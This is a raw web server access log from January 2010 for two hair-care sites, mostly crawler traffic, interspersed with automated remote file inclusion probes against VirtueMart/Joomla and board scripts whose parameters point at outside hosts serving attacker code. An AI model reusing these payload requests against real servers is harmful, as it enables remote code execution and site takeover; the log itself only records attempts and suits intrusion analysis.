125.128.28.202 - - [12/Jan/2010:11:45:56 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.128.28.202 - - [12/Jan/2010:11:45:57 -0800] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:12:01:41 -0800] "GET /components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:12:01:41 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.149.207.114 - - [12/Jan/2010:12:01:41 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.80.193.30 - - [12/Jan/2010:12:04:28 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; YPC 3.2.0; (R1 1.3); .NET CLR 1.1.4322)" "growlonghairfast.com"
121.149.207.114 - - [12/Jan/2010:12:06:32 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/errors.php?error=http://pappermint.casu.net/bbs/icon/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.128.28.202 - - [12/Jan/2010:12:07:06 -0800] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.41 - - [12/Jan/2010:12:09:45 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
125.128.28.202 - - [12/Jan/2010:12:10:06 -0800] "GET /logs/access.log//skin/ggambo7002_board/comment_modify.php?dir=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:12:27:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
124.115.0.162 - - [12/Jan/2010:12:36:47 -0800] "GET / HTTP/1.1" 200 926 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:37:15 -0800] "GET /logs/access.log//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:37:16 -0800] "GET /include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:37:16 -0800] "GET /logs//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:40:24 -0800] "GET /logs/access.log//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:40:25 -0800] "GET /include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:12:40:26 -0800] "GET /logs//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:12:44:12 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:12:44:12 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:12:44:12 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.80.193.36 - - [12/Jan/2010:12:47:18 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sorum kommune; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "freehairsecrets.com"
209.202.168.78 - - [12/Jan/2010:12:51:54 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.freehairsecrets.com"
209.202.168.78 - - [12/Jan/2010:12:51:54 -0800] "GET /logs/access_090525.log HTTP/1.0" 404 - "-" "GingerCrawler/1.0 (Language Assistant for Dyslexics; www.gingersoftware.com/crawler_agent.htm; support at ginger software dot com)" "www.freehairsecrets.com"
124.115.6.16 - - [12/Jan/2010:12:55:06 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:12:59:25 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:13:03:45 -0800] "GET /logs/access.log//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:13:03:45 -0800] "GET /include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:13:03:45 -0800] "GET /logs//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jan/2010:13:05:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:27 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8816 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:30 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11412 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:34 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20945 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:37 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17215 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:40 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:43 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9876 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:46 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2852 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:49 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:52 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1194 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:55 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17789 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:10:57 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17323 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:00 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9328 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17595 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2924 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=5925 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:15 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18675 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17981 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:21 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17974 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:24 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16503 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:28 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17665 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:30 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17463 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:33 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16223 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:11:39 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6961 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:14 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2133 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1186 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:42 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7662 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:13:56 -0800] "GET /freehairsecretsphp/viewtopic.php?p=10260 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:14:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:14:19 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6131 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:13:14:24 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18783 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
200.101.70.1 - - [12/Jan/2010:13:18:36 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.101.70.1 - - [12/Jan/2010:13:18:42 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.101.70.1 - - [12/Jan/2010:13:18:43 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:25:53 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:25:55 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16923 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:25:58 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18673 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:00 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17696 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:01 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16234 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:03 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8741 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16419 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20969 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:06 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11471 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:09 -0800] "GET /freehairsecretsphp/viewtopic.php?p=4365 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:11 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17622 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17995 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:13:26:13 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16498 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "freehairsecrets.com"
212.90.98.94 - - [12/Jan/2010:13:30:02 -0800] "GET /logs//bbs///skin/buzzard_espoon/setup.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.90.98.94 - - [12/Jan/2010:13:30:03 -0800] "GET /logs/access.log%20%20//bbs///skin/buzzard_espoon/setup.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.90.98.94 - - [12/Jan/2010:13:30:03 -0800] "GET /bbs///skin/buzzard_espoon/setup.php?dir=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
71.6.189.153 - - [12/Jan/2010:13:30:43 -0800] "GET /logs/access_091130.log//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jan/2010:13:31:14 -0800] "GET /freehairsecretsphp/viewtopic.php?p=10635 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:18 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11100 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:22 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12545 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:26 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1338 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15606 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1564 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17789 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:47 -0800] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:51 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20897 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:13:31:56 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9432 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
58.61.164.141 - - [12/Jan/2010:13:47:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13021 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:48:58 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:48:58 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:48:58 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.45.123.132 - - [12/Jan/2010:13:51:42 -0800] "GET /logs/access.log//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
201.45.123.132 - - [12/Jan/2010:13:51:43 -0800] "GET /include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
201.45.123.132 - - [12/Jan/2010:13:51:43 -0800] "GET /logs//include/write.php?dir=http://www.metropolitanediciones.com/content/inc/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:56:50 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:56:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:13:56:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.61.164.140 - - [12/Jan/2010:14:07:06 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7572 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:14:11:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:14:11:32 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:14:11:32 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
